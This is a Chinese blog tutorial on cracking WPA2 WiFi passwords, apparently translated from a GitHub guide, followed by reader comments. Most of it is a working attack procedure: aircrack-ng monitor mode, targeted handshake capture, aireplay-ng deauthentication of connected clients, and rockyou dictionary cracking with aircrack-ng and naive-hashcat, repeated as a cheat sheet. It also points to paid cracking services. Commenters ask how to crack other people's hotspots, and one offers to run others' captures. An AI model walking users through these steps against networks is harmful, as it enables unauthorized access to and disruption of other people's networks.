登录
  • 人们都希望被别人需要 却往往事与愿违
  • 翻墙和OX的相似之处:一旦会做就老想做; 做第一次之后觉得天地豁然开朗; 每次做都有快感; 觉得不会做的都是SB!

小土豆手把手教你破WiFi

畅言 Benny小土豆 11973次浏览 3509字 29个评论
文章目录[显示]
这篇文章在 2020年05月02日11:08:13 更新了哦~

本文差不多是https://github.com/brannondorsey/wifi-cracking的翻译以及一些遇到的坑。

前言

大家看啊,那WiFi可是电磁波啊,电磁波在空间里传播出来,那方向可是没人能控制的,所以是个无线网卡都能给接收下来……是不是有点像集线器网络下的"混杂模式啊",只不过无线网卡并不需要加入到网络中就能"监听"呢。

好吧,是加密的,但是,咱都是懒懒的,万一要是设置了123456789这样的弱口令,就比较容易抓到握手包然后暴力破解啦。

就让小土豆俺来手把手教你破WiFi密码吧!

免责声明:本教程以及工具仅限于学习目的使用,请勿在未授权的网络环境中使用,本人概不负责。

准备工作

你需要一个装有Debian系的Linux发行版,Kali最好啦;

你需要安装好aircrack-ng;

sudo apt-get install aircrack-ng

你需要有个支持监听模式的无线网卡,最好还是那种和aircrack兼容性比较好的网卡;

最好再熟悉下Linux的操作

进入监听模式

咱呐,最好选个兼容性比较高的无线网卡,别搞半天进不去监听模式就糟糕了。

首先先看看有哪些无线网卡,我们可以看到无线网卡此时的工作模式是managed

iwconfig

然后列出来哪些网卡是支持监听模式

airmon-ng

小土豆手把手教你破WiFi

如果显示为空白,那么就是你的无线网卡不支持监听模式 :-(

俺这里就用wlan1这个网卡啦(BCM43142实在是大坑),为了避免干扰,我们先关了其他的使用网络的进程

airmon-ng check kill

小土豆手把手教你破WiFi

进入监听模式

airmon-ng start wlan1

之后我们使用iwconfig来确定进入了监听模式,俺的设备的名字叫做wlan1mon,可以清楚看到Mode: Monitor

小土豆手把手教你破WiFi

搜寻目标

airodump-ng wlan1mon

咱大概能看到类似下面这样的输出,此次我们的目标是我的新路由器PDCN,我们需要记住BSSID和CH

小土豆手把手教你破WiFi

抓4次握手包

airodump-ng -c 13 --bssid 20:76:93:00:41:DC -w test wlan1mon

其中-c后面的参数代表信道(CH),--bssid是上面记下来的MAC地址,-w后面代表输出文件的名字,我们这里就叫test了。

小土豆手把手教你破WiFi

现在我们只需要等待了,只要有设备连接到WiFi,我们就很有可能抓到握手包,此时右上角大概会显示WPA handshake 什么什么的,如下图所示

小土豆手把手教你破WiFi

这个……万一一直没人连咋办?咱可以想办法让已连接的设备断开连接,之后这个设备肯定会自动连接的,这个时候抓到握手包就可以啦

Deauth加快抓握手包

我们继续观察上面抓握手包的窗口,直到下面STATION出现一个已经连接的设备,这是必然会出现的,然后新开终端,输入如下命令:

aireplay-ng -0 10 –a 20:76:93:00:41:DC -c 00::0C:E7:76:94:03 wlan1mon

其中:-0 10代表我们要发送10次deauth包,-a 代表WiFi的MAC,-c代表客户的MAC

小土豆手把手教你破WiFi

当抓到握手包之后,就可以停止监听啦,按Ctrl + C停止airodump

这个方法可能不好用……

恢复网络

airmon-ng stop wlan1mon
service network-manager start

我们的握手包就叫test.cap啦。

破解密码

抓下来握手包之后,破解密码是个运气和耐心活,咱可以去一些在线网站尝试着破解,或者去淘宝跑。在线破解网站比如说https://www.onlinehashcrack.com/wifi-wpa-rsna-psk-crack.phphttps://gpuhash.me/

咱这里选择本地破解啦,首先,需要有个比较好用的弱口令字典,这就要自己看咯;

本地破解有很多工具,其一是使用hashcat,这家伙能利用GPU;我们也可以使用传统的aircrack

Aircrack-ng

下载弱口令字典并破解握手包

curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
aircrack-ng -a2 -b 20:76:93:00:41:DC -w rockyou.txt test.cap

-b代表bssid,-a2代表 WPA2,-w是字典,如果运气好的话……

小土豆手把手教你破WiFi
123456789就是WiFi密码

使用naive-hashcat破解

在使用naive-hashcat破解之前,我们需要先把.cap 文件转换成.hccapx.,可以使用在线转换https://hashcat.net/cap2hccapx/或者使用本地工具,这里就用本地工具啦

git clone https://github.com/hashcat/hashcat-utils
cd hashcat-utils/src && make
./cap2hccapx.bin ~/test.cap ~/test.hccapx

小土豆手把手教你破WiFi

之后下载naïve-hashcat破解

git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
HASH_FILE=test.hccapx POT_FILE=test.txt HASH_TYPE=2500 ./naive-hashcat.sh

HASH_FILE是转换之后的文件名,POT_FILE是最后用来保存结果的文件名
我猜你一定会报错的,大概是这样

小土豆手把手教你破WiFi

说了这东西用GPU破解的,自然的嘛…

如果你的英伟达显卡的话:

apt install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev pocl-opencl-icd nvidia-opencl-icd libxnvctrl-dev nvidia-opencl-dev libgmp3-dev libgmp10-doc opencl-headers

然后重启,之后再运行:

HASH_FILE=test.hccapx POT_FILE=test.txt HASH_TYPE=2500 ./naive-hashcat.sh

如果破解出密码了,程序就会退出,之后看那个text.txt最后一个字段就是密码

小土豆手把手教你破WiFi

总结

下面是一些常用命令的总结

# 进入监听模式
airmon-ng start wlan0

# 监听
airodump-ng mon0

# 抓握手包
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# deauth
aireplay-ng -0 10 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## aircrack-ng破解密码 #########
# 如有需要,下载字典
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# 使用aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## naive-hashcat 破解密码##########
# 将 cap 文件转换成 hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
# 用 naive-hashcat破解
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

参考资料

http://www.aircrack-ng.org/doku.php?id=airmon-ng

https://github.com/brannondorsey/wifi-cracking

最后的感想

好吧,被人抓到握手包是必然的,deauth也是必然的;如果不想被别人破了自家WiFi,那就设置个比较复杂的密码吧,这样暴力破解时间就会指数级上升,很多人就知难而退了。
哎,弱口令真是最大的弱点啊!

备注与更新

macOS自带诊断工具可以做到抓握手包,具体可以参考GitHub的地址


文章版权归原作者所有丨本站默认采用CC-BY-NC-SA 4.0协议进行授权|
转载必须包含本声明,并以超链接形式注明原作者和本文原始地址:
https://dmesg.app/wifi-cracking.html
喜欢 (10)
分享:-)
关于作者:
If you have any further questions, feel free to contact me in English or Chinese.
发表我的评论(代码和日志请使用Pastebin或Gist)
取消评论

                     

去你妹的实名制!

  • 昵称 (必填)
  • 邮箱 (必填,不要邮件提醒可以随便写)
  • 网址 (选填)
(29)个小伙伴在吐槽
  1. 我想破一个5Ghz的热点,土豆哥知道有什么好的网卡(或者芯片)可以在5Ghz(11ac)频段监听吗?jd上面我看很多采用联发科方案的,感觉开不起监听模式
    cok332018-09-15 08:12 回复
    • 这个,其实……我并不知道……
      Benny小土豆2018-09-15 12:30 回复
      • 哈哈?,看来只能亲身实验了~
        cok332018-09-15 23:26 回复
      • 土豆哥,为什么你说aireplay时说“这个方法可能不好用……”,然后最后的感想又说:deauth 也是必然的? 这是不是前后矛盾? 我发现aireplay对部分热点和频段似乎不能发现热点,无法攻击,土豆哥在这方面可以告知下原委吗?
        cok332018-11-03 18:24 回复
        • emmm..不好用是因为有的时候可能会遇到总也没人连的热点,还有一些信号强度等因素,而且deauth也可以被耍……必然是因为……大部分情况下deauth是可以的。
          Benny小土豆2018-11-04 09:15
  2. 大佬请教一下虚拟机安装ubuntu 可否能用来抓包?
    damon2018-07-15 17:29 回复
    • USB无线网卡应该可以的。
      Benny小土豆2018-07-16 09:05 回复
  3. 我用的是CDlinux集成在虚拟机下用水滴抓包,但是用EWSA跑包,老实说,弱密码哪有那多人,我都是跑10G的那个完美字典4个小时左右,原来成功高,现在好低,光猫就更难了,我这还有2个包没跑出来呢。8位小字母与数字要跑3个月,没戏啊。如果你确认密码不难我免费,有空帮跑下,4个小时左右出来,没成功就放弃吧,光猫就问主人要密码,或者看WIFI钥匙上有没,硬破难难难!!
    一个SB2017-10-17 20:28 回复
    • 嗯 其实跑字典挺慢的,真是个运气活。与其跑字典还不如先试试什么万能钥匙的。
      Benny小土豆2017-10-17 21:04 回复
    • 以前用水滴。现在直接万能钥匙。
      song2017-10-20 09:48 回复
      • 看运气的事~?
        Benny小土豆2017-10-20 14:33 回复
  4. 唔,第二个在线破解握手包的网站需要支付btc.....
    永远的萌新2017-09-27 19:03 回复
    • 唔……万能的淘宝啊
      Benny小土豆2017-09-28 09:02 回复
      • TB已经屏蔽关键词啦~我打算去学校机房找几台电脑跑~
        永远的萌新2017-09-28 09:06 回复
        • :-(要跑很久
          Benny小土豆2017-09-28 09:30
      • 唔,已经放弃了23333
        永远的萌新2017-09-28 15:00 回复
  5. wow,今天刚装好kali,明天一定要试一下,感觉很有趣的样子呢!
    nian2017-08-21 23:52 回复
    • 是的,超有趣的发行版哟,嘿嘿!
      Benny小土豆2017-08-22 08:45 回复
  6. 感谢dalao教程~ 话说,USB网卡是否可以呢?(在各种搜索的结果里有说可用的,但是我没成功过,所以不确定...)
    永远的萌新2017-08-21 16:35 回复
    • USB无线网卡可以的(甚至可以说推荐用那种锅盖似的无线网卡),只要支持监听模式就可以。比如说我图里的那个就是外置无线网卡。
      Benny小土豆2017-08-21 16:42 回复
      • 然而...驱动什么的,应该会很麻烦吧? 我在Ubuntu 16.04下尝试使用小米网卡,下载到的驱动编译出错(具体是什么错误忘记了),然后又据说内核自带驱动,尝试启用又失败了(然而还是忘记怎么失败的) dalao你是使用什么网卡的呢?能否说一下使用的过程...
        永远的萌新2017-08-21 18:10 回复
        • 我用的是realtek 8192还是8198的,记不清了。如果没能免驱,试试自己编译,去官网和GitHub看看。还有就是ubuntu设置-软件和更新-附加驱动里也可能会有驱动支持。
          Benny小土豆2017-08-21 18:37
      • 感谢~ 话说,在Android是否有方法使用USB网卡呢?
        永远的萌新2017-08-21 18:56 回复
        • 这个……我没尝试过,你可以自己搜索试试,貌似有一些成功的案例。
          Benny小土豆2017-08-21 19:04
      • 再次感谢~我会试试看的~
        永远的萌新2017-08-21 20:13 回复
        • 建议用电脑~
          Benny小土豆2017-08-21 20:17
      • 嗯嗯~
        永远的萌新2017-08-21 23:06 回复
  7. 直接用Kali Linux的话可以少装一点东西?
    RS2017-07-28 05:37 回复
    • 对,啥都有……
      Benny小土豆2017-07-28 09:18 回复